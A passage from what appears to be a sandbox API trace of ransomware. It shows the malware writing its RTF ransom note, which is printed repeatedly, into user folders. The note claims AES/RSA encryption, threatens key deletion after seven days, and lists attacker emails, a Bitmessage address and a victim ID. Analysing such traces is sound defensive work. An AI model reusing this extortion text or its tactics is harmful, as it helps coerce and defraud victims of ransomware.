message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0298.671] WriteFile (in: hFile=0x2ec, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.673] CloseHandle (hObject=0x2ec) returned 1 [0298.673] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\#readme_eman#.rtf")) returned 0x20 [0298.673] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\kk\\#readme_eman#.rtf")) returned 0xffffffff [0298.673] GetLastError () returned 0x2 [0298.673] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\kk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0298.674] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.674] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be 